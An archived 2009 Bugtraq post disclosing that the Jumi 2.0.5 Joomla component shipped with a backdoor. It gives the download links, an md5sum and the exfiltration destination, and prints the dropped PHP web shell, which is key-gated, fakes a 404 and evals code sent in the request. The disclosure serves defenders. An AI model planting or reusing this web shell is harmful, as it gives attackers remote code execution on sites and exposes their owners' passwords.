lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <f1823b730910300000t19639bc1ic83b67289ab08440@mail.gmail.com>
Date: Fri, 30 Oct 2009 09:00:52 +0200
From: Jan van Niekerk <jvnkrk@...il.com>
To: bugtraq <bugtraq@...urityfocus.com>
Cc: abuse@...gateway.de
Subject: com_jumi / jumi 2.0.5 for joomla 1.5 backdoored

Summary: another backdoored joomla component (yawn)

Application: Jumi, a joomla component

About Jumi:
  Jumi is the set of custom code extensions for Joomla! 1.0.x and 1.5.x in
  their native modes. Since 2006 more then 200.000 downloads.  With Jumi you
  can include php, html, javascript scripts into the modules position,
  articles, category or section descriptions, or into your own custom made
  component pages.
Fun snippet from the release_notes.txt:
  Changes:
    - Fixed: security vulnerability
Vendor notified:
  *.cz .. I looked at the fun pictures on the "about us" screen, and
left it at that.
  Joomla?  A CC of this mail on their "STRIKE TEAM" form (are you
afraid of e-mail gentlemen?)

Download url/s:
  http://extensions.joomla.org/extensions/search/jumi
  http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53
  http://jumi.vedeme.cz/index.php?option=com_remository&Itemid=53&func=startdown&id=56

md5sum:
  1037de7cc97ba348440a93db1ee89400  jumi_pack_2.0.5_for_J1.5.zip

The installation sends your joomla URL and passwords to
http://my-wnl.org/index.php and drops the following file:

  modules/mod_mainmenu/tmpl/.config.php

Which says that the loveless individual who did the backdooring
doesn't like to share (c'mon man, give a bit):

<?php
if(empty ($_REQUEST['key']) ||
sha1(md5($_REQUEST['key']))!='0b6045b268cf676864a27d9663cee0a634431467'){header("HTTP/1.0
404 Not Found"); exit();}
header("Content-Type: Text/Plain");
eval(stripslashes($_REQUEST['php']));
 ?>

abuse@...gateway.de: you are hosting the backdoor notification site

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ